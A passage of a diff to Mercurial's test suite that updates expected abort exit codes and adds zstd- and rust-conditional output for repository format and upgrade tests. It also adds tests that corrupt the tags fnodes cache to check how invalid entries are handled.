+46,13 @@ $ hg bundle -a --type="none-v2;stream=v2" bundle.hg $ hg debugbundle bundle.hg Stream params: {} - stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) + stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) (no-zstd !) + stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) (zstd no-rust !) + stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Cpersistent-nodemap%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) (rust !) $ hg debugbundle --spec bundle.hg - none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore + none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore (no-zstd !) + none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore (zstd no-rust !) + none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Cpersistent-nodemap%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore (rust !) 
Test that we can apply the bundle as a stream clone bundle diff --git a/tests/test-strip.t b/tests/test-strip.t --- a/tests/test-strip.t +++ b/tests/test-strip.t @@ -427,7 +427,7 @@ strip failed, unrecovered changes stored in '$TESTTMP/test/.hg/strip-backup/*-temp.hg' (glob) (fix the problem, then recover the changesets with "hg unbundle '$TESTTMP/test/.hg/strip-backup/*-temp.hg'") (glob) abort: pretxnchangegroup.bad hook exited with status 1 - [255] + [40] $ restore $ hg log -G o changeset: 4:443431ffac4f diff --git a/tests/test-tag.t b/tests/test-tag.t --- a/tests/test-tag.t +++ b/tests/test-tag.t @@ -290,7 +290,7 @@ $ rm -f .hg/last-message.txt $ HGEDITOR="\"sh\" \"`pwd`/editor.sh\"" hg tag custom-tag -e abort: pretag.test-saving-lastmessage hook exited with status 1 - [255] + [40] $ test -f .hg/last-message.txt [1] @@ -325,7 +325,7 @@ note: commit message saved in .hg/last-message.txt note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt custom tag message second line diff --git a/tests/test-tags.t b/tests/test-tags.t --- a/tests/test-tags.t +++ b/tests/test-tags.t @@ -104,7 +104,7 @@ 0010: ff ff ff ff ff ff ff ff b9 15 46 36 26 b7 b4 a7 |..........F6&...| 0020: 73 e0 9e e3 c5 2f 51 0e 19 e0 5e 1f f9 66 d8 59 |s..../Q...^..f.Y| $ hg debugtagscache - 0 acb14030fe0a21b60322c440ad2d20cf7685a376 missing/invalid + 0 acb14030fe0a21b60322c440ad2d20cf7685a376 missing 1 b9154636be938d3d431e75a7c906504a079bfe07 26b7b4a773e09ee3c52f510e19e05e1ff966d859 Repeat with cold tag cache: @@ -381,7 +381,7 @@ $ hg debugtagscache | tail -2 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d - 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 missing/invalid + 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 missing $ hg tags tip 5:8dbfe60eff30 bar 1:78391a272241 @@ -389,6 +389,77 @@ 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 
0c04f2a8af31de17fab7422878ee5a2dadbc943d 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8af31de17fab7422878ee5a2dadbc943d +If the 4 bytes of node hash for a record don't match an existing node, the entry +is flagged as invalid. + + >>> import os + >>> with open(".hg/cache/hgtagsfnodes1", "rb+") as fp: + ... fp.seek(-24, os.SEEK_END) and None + ... fp.write(b'\xde\xad') and None + + $ f --size --hexdump .hg/cache/hgtagsfnodes1 + .hg/cache/hgtagsfnodes1: size=144 + 0000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................| + 0010: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................| + 0020: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................| + 0030: 7a 94 12 77 0c 04 f2 a8 af 31 de 17 fa b7 42 28 |z..w.....1....B(| + 0040: 78 ee 5a 2d ad bc 94 3d 6f a4 50 21 7d 3b 71 8c |x.Z-...=o.P!};q.| + 0050: 96 4e f3 7b 89 e5 50 eb da fd 57 89 e7 6c e1 b0 |.N.{..P...W..l..| + 0060: 0c 19 2d 7d 0c 04 f2 a8 af 31 de 17 fa b7 42 28 |..-}.....1....B(| + 0070: 78 ee 5a 2d ad bc 94 3d de ad e6 0e 0c 04 f2 a8 |x.Z-...=........| + 0080: af 31 de 17 fa b7 42 28 78 ee 5a 2d ad bc 94 3d |.1....B(x.Z-...=| + + $ hg debugtagscache | tail -2 + 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d + 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 invalid + + $ hg tags + tip 5:8dbfe60eff30 + bar 1:78391a272241 + +BUG: If the filenode part of an entry in hgtagsfnodes is corrupt and +tags2-visible is missing, `hg tags` aborts. Corrupting the leading 4 bytes of +node hash (as above) doesn't seem to trigger the issue. Also note that the +debug command hides the corruption, both with and without tags2-visible. + + $ mv .hg/cache/hgtagsfnodes1 .hg/cache/hgtagsfnodes1.bak + $ hg debugupdatecaches + + >>> import os + >>> with open(".hg/cache/hgtagsfnodes1", "rb+") as fp: + ... fp.seek(-16, os.SEEK_END) and None + ... 
fp.write(b'\xde\xad') and None + + $ f --size --hexdump .hg/cache/hgtagsfnodes1 + .hg/cache/hgtagsfnodes1: size=144 + 0000: bb d1 79 df 00 00 00 00 00 00 00 00 00 00 00 00 |..y.............| + 0010: 00 00 00 00 00 00 00 00 78 39 1a 27 0c 04 f2 a8 |........x9.'....| + 0020: af 31 de 17 fa b7 42 28 78 ee 5a 2d ad bc 94 3d |.1....B(x.Z-...=| + 0030: 7a 94 12 77 0c 04 f2 a8 af 31 de 17 fa b7 42 28 |z..w.....1....B(| + 0040: 78 ee 5a 2d ad bc 94 3d 6f a4 50 21 7d 3b 71 8c |x.Z-...=o.P!};q.| + 0050: 96 4e f3 7b 89 e5 50 eb da fd 57 89 e7 6c e1 b0 |.N.{..P...W..l..| + 0060: 0c 19 2d 7d 0c 04 f2 a8 af 31 de 17 fa b7 42 28 |..-}.....1....B(| + 0070: 78 ee 5a 2d ad bc 94 3d 8d bf e6 0e 0c 04 f2 a8 |x.Z-...=........| + 0080: de ad de 17 fa b7 42 28 78 ee 5a 2d ad bc 94 3d |......B(x.Z-...=| + + $ hg debugtagscache | tail -2 + 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d + 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8deadde17fab7422878ee5a2dadbc943d (unknown node) + + $ rm -f .hg/cache/tags2-visible + $ hg debugtagscache | tail -2 + 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d + 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8deadde17fab7422878ee5a2dadbc943d (unknown node) + + $ hg tags + tip 5:8dbfe60eff30 + bar 1:78391a272241 + +BUG: Unless this file is restored, the `hg tags` in the next unix-permissions +conditional will fail: "abort: data/.hgtags.i@0c04f2a8dead: no match found" + + $ mv .hg/cache/hgtagsfnodes1.bak .hg/cache/hgtagsfnodes1 + #if unix-permissions no-root Errors writing to .hgtags fnodes cache are silently ignored @@ -405,7 +476,7 @@ $ hg blackbox -l 6 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> tags 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> couldn't write cache/hgtagsfnodes1: [Errno *] * (glob) - 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> 3/4 cache hits/lookups in * seconds (glob) 
+ 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> 2/4 cache hits/lookups in * seconds (glob) 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> writing .hg/cache/tags2-visible with 1 tags 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> tags exited 0 after * seconds (glob) 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> blackbox -l 6 @@ -420,7 +491,7 @@ $ hg blackbox -l 6 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> tags 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> writing 24 bytes to cache/hgtagsfnodes1 - 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> 3/4 cache hits/lookups in * seconds (glob) + 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> 2/4 cache hits/lookups in * seconds (glob) 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> writing .hg/cache/tags2-visible with 1 tags 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> tags exited 0 after * seconds (glob) 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> blackbox -l 6 diff --git a/tests/test-template-map.t b/tests/test-template-map.t --- a/tests/test-template-map.t +++ b/tests/test-template-map.t @@ -1606,7 +1606,7 @@ $ hg bisect -g 1 $ hg bisect -b 3 --noupdate - Testing changeset 2:97054abb4ab8 (2 changesets remaining, ~1 tests) + Testing changeset 2:97054abb4ab8 "no person" (2 changesets remaining, ~1 tests) $ hg log -T bisect -r 0:4 changeset: 0:1e4e1b8f71e0 bisect: good (implicit) diff --git a/tests/test-transplant.t b/tests/test-transplant.t --- a/tests/test-transplant.t +++ b/tests/test-transplant.t @@ -1091,7 +1091,7 @@ transaction abort! rollback completed abort: pretxncommit.abort hook exited with status 1 - [255] + [40] $ cat >> .hg/hgrc <<EOF > [hooks] > pretxncommit.abort = ! 
diff --git a/tests/test-treemanifest.t b/tests/test-treemanifest.t --- a/tests/test-treemanifest.t +++ b/tests/test-treemanifest.t @@ -832,10 +832,13 @@ Packed bundle $ hg -R deeprepo debugcreatestreamclonebundle repo-packed.hg - writing 5330 bytes for 18 files - bundle requirements: generaldelta, revlogv1, sparserevlog, treemanifest + writing 5330 bytes for 18 files (no-zstd !) + writing 5400 bytes for 18 files (zstd !) + bundle requirements: generaldelta, revlogv1, sparserevlog, treemanifest (no-rust !) + bundle requirements: generaldelta, persistent-nodemap, revlogv1, sparserevlog, treemanifest (rust !) $ hg debugbundle --spec repo-packed.hg - none-packed1;requirements%3Dgeneraldelta%2Crevlogv1%2Csparserevlog%2Ctreemanifest + none-packed1;requirements%3Dgeneraldelta%2Crevlogv1%2Csparserevlog%2Ctreemanifest (no-rust !) + none-packed1;requirements%3Dgeneraldelta%2Cpersistent-nodemap%2Crevlogv1%2Csparserevlog%2Ctreemanifest (rust !) #endif diff --git a/tests/test-unamend.t b/tests/test-unamend.t --- a/tests/test-unamend.t +++ b/tests/test-unamend.t @@ -39,7 +39,7 @@ $ hg unamend abort: changeset must have one predecessor, found 0 predecessors - [255] + [10] Unamend on clean wdir and tip diff --git a/tests/test-uncommit.t b/tests/test-uncommit.t --- a/tests/test-uncommit.t +++ b/tests/test-uncommit.t @@ -114,12 +114,12 @@ $ hg uncommit nothinghere abort: cannot uncommit "nothinghere" (file does not exist) - [255] + [10] $ hg status $ hg uncommit file-abc abort: cannot uncommit "file-abc" (file was not changed in working directory parent) - [255] + [10] $ hg status Try partial uncommit, also moves bookmark @@ -419,7 +419,7 @@ $ hg uncommit abort: cannot uncommit merge changeset - [255] + [10] $ hg status $ hg log -G -T '{rev}:{node} {desc}' --hidden @@ -585,12 +585,12 @@ $ hg uncommit emptydir abort: cannot uncommit "emptydir" (file was untracked in working directory parent) - [255] + [10] $ cd emptydir $ hg uncommit . 
abort: cannot uncommit "emptydir" (file was untracked in working directory parent) - [255] + [10] $ hg status $ cd .. diff --git a/tests/test-up-local-change.t b/tests/test-up-local-change.t --- a/tests/test-up-local-change.t +++ b/tests/test-up-local-change.t @@ -175,7 +175,7 @@ $ hg up 1 b: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ rm b test conflicting untracked ignored file @@ -195,7 +195,7 @@ $ hg up 'desc("add ignored file")' ignored: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] test a local add diff --git a/tests/test-update-branches.t b/tests/test-update-branches.t --- a/tests/test-update-branches.t +++ b/tests/test-update-branches.t @@ -324,7 +324,7 @@ $ hg up -q 4 abort: conflicting changes (commit or update --clean to discard changes) - [255] + [20] $ hg up -m 4 merging a warning: conflicts while merging a! (edit, then use 'hg resolve --mark') diff --git a/tests/test-upgrade-repo.t b/tests/test-upgrade-repo.t --- a/tests/test-upgrade-repo.t +++ b/tests/test-upgrade-repo.t @@ -3,6 +3,9 @@ $ cat >> $HGRCPATH << EOF > [extensions] > share = + > [format] + > # stabilize test accross variant + > revlog-compression=zlib > EOF store and revlogv1 are required in source @@ -21,7 +24,7 @@ > EOF $ hg -R no-revlogv1 debugupgraderepo - abort: cannot upgrade repository; requirement missing: revlogv1 + abort: cannot upgrade repository; missing a revlog version [255] Cannot upgrade shared repositories @@ -58,9 +61,10 @@ generaldelta: yes share-safe: no sparserevlog: yes - sidedata: no - persistent-nodemap: no + persistent-nodemap: no (no-rust !) + persistent-nodemap: yes (rust !) 
copies-sdc: no + revlog-v2: no plain-cl-delta: yes compression: zlib compression-level: default @@ -71,11 +75,13 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zlib zlib zstd (zstd !) compression-level: default default default $ hg debugformat --verbose --config format.usefncache=no format-variant repo config default @@ -84,11 +90,13 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zlib zlib zstd (zstd !) 
compression-level: default default default $ hg debugformat --verbose --config format.usefncache=no --color=debug format-variant repo config default @@ -97,11 +105,13 @@ [formatvariant.name.uptodate|generaldelta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] [formatvariant.name.uptodate|share-safe: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|sparserevlog: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] - [formatvariant.name.uptodate|sidedata: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] - [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] + [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] (no-rust !) + [formatvariant.name.mismatchdefault|persistent-nodemap:][formatvariant.repo.mismatchdefault| yes][formatvariant.config.special| yes][formatvariant.default| no] (rust !) [formatvariant.name.uptodate|copies-sdc: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] + [formatvariant.name.uptodate|revlog-v2: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|plain-cl-delta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] - [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib] + [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib] (no-zstd !) 
+ [formatvariant.name.mismatchdefault|compression: ][formatvariant.repo.mismatchdefault| zlib][formatvariant.config.special| zlib][formatvariant.default| zstd] (zstd !) [formatvariant.name.uptodate|compression-level: ][formatvariant.repo.uptodate| default][formatvariant.config.default| default][formatvariant.default| default] $ hg debugformat -Tjson [ @@ -136,21 +146,23 @@ "repo": true }, { + "config": false, (no-rust !) + "config": true, (rust !) + "default": false, + "name": "persistent-nodemap", + "repo": false (no-rust !) + "repo": true (rust !) + }, + { "config": false, "default": false, - "name": "sidedata", + "name": "copies-sdc", "repo": false }, { "config": false, "default": false, - "name": "persistent-nodemap", - "repo": false - }, - { - "config": false, - "default": false, - "name": "copies-sdc", + "name": "revlog-v2", "repo": false }, { @@ -161,7 +173,8 @@ }, { "config": "zlib", - "default": "zlib", + "default": "zlib", (no-zstd !) + "default": "zstd", (zstd !) "name": "compression", "repo": "zlib" }, @@ -177,7 +190,8 @@ performing an upgrade with "--run" will make the following changes: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) processed revlogs: - all-filelogs @@ -201,7 +215,8 @@ $ hg debugupgraderepo --quiet requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) 
processed revlogs: - all-filelogs @@ -216,7 +231,8 @@ performing an upgrade with "--run" will make the following changes: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-parent @@ -247,7 +263,8 @@ performing an upgrade with "--run" will make the following changes: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-parent @@ -272,7 +289,8 @@ $ hg debugupgrade --optimize re-delta-parent --quiet requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-parent @@ -303,9 +321,9 @@ generaldelta: no share-safe: no sparserevlog: no - sidedata: no persistent-nodemap: no copies-sdc: no + revlog-v2: no plain-cl-delta: yes compression: zlib compression-level: default @@ -316,11 +334,13 @@ generaldelta: no yes yes share-safe: no no no sparserevlog: no yes yes - sidedata: no no no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: no yes no (rust !) copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zlib zlib zstd (zstd !) 
compression-level: default default default $ hg debugformat --verbose --config format.usegeneraldelta=no format-variant repo config default @@ -329,11 +349,13 @@ generaldelta: no no yes share-safe: no no no sparserevlog: no no yes - sidedata: no no no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: no yes no (rust !) copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zlib zlib zstd (zstd !) compression-level: default default default $ hg debugformat --verbose --config format.usegeneraldelta=no --color=debug format-variant repo config default @@ -342,11 +364,13 @@ [formatvariant.name.mismatchdefault|generaldelta: ][formatvariant.repo.mismatchdefault| no][formatvariant.config.special| no][formatvariant.default| yes] [formatvariant.name.uptodate|share-safe: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.mismatchdefault|sparserevlog: ][formatvariant.repo.mismatchdefault| no][formatvariant.config.special| no][formatvariant.default| yes] - [formatvariant.name.uptodate|sidedata: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] - [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] + [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] (no-rust !) + [formatvariant.name.mismatchconfig|persistent-nodemap:][formatvariant.repo.mismatchconfig| no][formatvariant.config.special| yes][formatvariant.default| no] (rust !) 
[formatvariant.name.uptodate|copies-sdc: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] + [formatvariant.name.uptodate|revlog-v2: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|plain-cl-delta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] - [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib] + [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib] (no-zstd !) + [formatvariant.name.mismatchdefault|compression: ][formatvariant.repo.mismatchdefault| zlib][formatvariant.config.special| zlib][formatvariant.default| zstd] (zstd !) [formatvariant.name.uptodate|compression-level: ][formatvariant.repo.uptodate| default][formatvariant.config.default| default][formatvariant.default| default] $ hg debugupgraderepo repository lacks features recommended by current config options: @@ -363,12 +387,16 @@ sparserevlog in order to limit disk reading and memory usage on older version, the span of a delta chain from its root to its end is limited, whatever the relevant data in this span. This can severly limit Mercurial ability to build good chain of delta resulting is much more storage space being taken and limit reusability of on disk delta during exchange. + persistent-nodemap (rust !) + persist the node -> rev mapping on disk to speedup lookup (rust !) + (rust !) performing an upgrade with "--run" will make the following changes: requirements preserved: revlogv1, store - added: dotencode, fncache, generaldelta, sparserevlog + added: dotencode, fncache, generaldelta, sparserevlog (no-rust !) + added: dotencode, fncache, generaldelta, persistent-nodemap, sparserevlog (rust !) 
fncache repository will be more resilient to storing certain paths and performance of certain operations should be improved @@ -382,6 +410,9 @@ sparserevlog Revlog supports delta chain with more unused data between payload. These gaps will be skipped at read time. This allows for better delta chains, making a better compression and faster exchange with server. + persistent-nodemap (rust !) + Speedup revision lookup by node id. (rust !) + (rust !) processed revlogs: - all-filelogs - changelog @@ -404,7 +435,8 @@ $ hg debugupgraderepo --quiet requirements preserved: revlogv1, store - added: dotencode, fncache, generaldelta, sparserevlog + added: dotencode, fncache, generaldelta, sparserevlog (no-rust !) + added: dotencode, fncache, generaldelta, persistent-nodemap, sparserevlog (rust !) processed revlogs: - all-filelogs @@ -424,6 +456,9 @@ sparserevlog in order to limit disk reading and memory usage on older version, the span of a delta chain from its root to its end is limited, whatever the relevant data in this span. This can severly limit Mercurial ability to build good chain of delta resulting is much more storage space being taken and limit reusability of on disk delta during exchange. + persistent-nodemap (rust !) + persist the node -> rev mapping on disk to speedup lookup (rust !) + (rust !) repository lacks features used by the default config options: dotencode @@ -434,7 +469,8 @@ requirements preserved: revlogv1, store - added: fncache, generaldelta, sparserevlog + added: fncache, generaldelta, sparserevlog (no-rust !) + added: fncache, generaldelta, persistent-nodemap, sparserevlog (rust !) fncache repository will be more resilient to storing certain paths and performance of certain operations should be improved @@ -445,6 +481,9 @@ sparserevlog Revlog supports delta chain with more unused data between payload. These gaps will be skipped at read time. This allows for better delta chains, making a better compression and faster exchange with server. 
+ persistent-nodemap (rust !) + Speedup revision lookup by node id. (rust !) + (rust !) processed revlogs: - all-filelogs - changelog @@ -503,7 +542,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, revlogv1, store + preserved: dotencode, fncache, revlogv1, store (no-rust !) + preserved: dotencode, fncache, persistent-nodemap, revlogv1, store (rust !) added: generaldelta generaldelta @@ -544,6 +584,7 @@ $ cat .hg/upgradebackup.*/requires dotencode fncache + persistent-nodemap (rust !) revlogv1 store @@ -553,6 +594,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 store @@ -604,7 +646,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store + preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !) added: sparserevlog sparserevlog @@ -632,11 +675,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... store replacement complete; repository was inconsistent for * (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) $ ls -1 .hg/ | grep upgradebackup [1] @@ -647,7 +688,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) 
optimisations: re-delta-parent @@ -679,11 +721,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... store replacement complete; repository was inconsistent for *s (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) Check that the repo still works fine @@ -726,7 +766,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-parent @@ -759,11 +800,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... store replacement complete; repository was inconsistent for *s (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) $ hg verify checking changesets @@ -778,7 +817,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) 
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-parent @@ -810,11 +850,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... store replacement complete; repository was inconsistent for *s (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) $ hg verify checking changesets @@ -829,7 +867,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-parent @@ -861,11 +900,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... store replacement complete; repository was inconsistent for *s (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) $ hg verify checking changesets @@ -884,7 +921,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store + preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !) 
